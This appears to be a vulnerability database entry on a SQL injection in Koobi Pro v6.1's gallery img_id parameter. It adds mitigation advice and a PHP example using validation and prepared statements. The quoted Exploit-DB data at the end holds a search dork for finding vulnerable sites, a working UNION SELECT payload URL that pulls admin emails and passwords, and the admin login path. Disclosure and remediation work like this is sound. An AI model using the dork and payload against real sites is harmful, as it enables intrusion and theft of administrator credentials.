Vendor: Koobi Pro
By: Bilge Kagan
CVSS: 9.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Koobi Pro
Affected Version From: Koobi Pro v6.1
Affected Version To: Koobi Pro v6.1
Patch Exists: No
Related CWE: N/A
CPE: a:koobi:koobi_pro:6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Koobi Pro v6.1 gallery (img_id)

This exploit allows an attacker to gain access to the admin panel of Koobi Pro v6.1 gallery by exploiting a SQL injection vulnerability in the img_id parameter of the index.php page (p=gallerypic). The attacker can use the search dork listed below (DORK 1) to find vulnerable websites and then use the EXPLOiT URL to extract admin credentials and log in to the admin panel.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries and input validation to prevent SQL injection attacks.
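As an added illustration of that mitigation (this is not Koobi Pro's own code; the table and column names, and the mysqli connection, are assumptions), the following PHP handler for the gallerypic page validates img_id as a positive integer and then passes it to the database only as a bound parameter, so the value can never alter the structure of the SQL statement:

```php
<?php
// Added example, not code from Koobi Pro. Hardened handling of the img_id
// parameter for index.php?p=gallerypic. Table/column names are assumptions.
declare(strict_types=1);

// Vulnerable pattern this replaces (do not use):
//   $sql = "SELECT ... FROM kpro6_gallery WHERE img_id = " . $_GET['img_id'];
// Concatenating the raw parameter lets a crafted value append a UNION SELECT.

function gallery_pic(mysqli $db, array $query): ?array
{
    // 1. Input validation: img_id must be a positive integer. Anything else
    //    (negative numbers, spaces, "union", quotes) is rejected before it
    //    reaches SQL, which alone stops "-1 union select ..." payloads.
    $imgId = filter_var(
        $query['img_id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($imgId === false) {
        http_response_code(400);
        return null;
    }

    // 2. Parameterized query: the value is bound as an integer ('i'), so the
    //    query text is fixed at prepare time and the input is data only.
    //    (mysqli_stmt::get_result() requires the mysqlnd driver.)
    $stmt = $db->prepare(
        'SELECT img_id, title, filename FROM kpro6_gallery WHERE img_id = ?'
    );
    $stmt->bind_param('i', $imgId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Usage in index.php (assumed connection details):
// $db = new mysqli('localhost', 'user', 'password', 'koobi');
// $pic = gallery_pic($db, $_GET);
```

Both layers are worth keeping: the integer check gives a clear 400 response and a log line to alert on, while the prepared statement protects the query even if a later code change forgets to validate.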
Source

Exploit-DB raw data:

##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user

ADMIN PANEL:

admin/login.php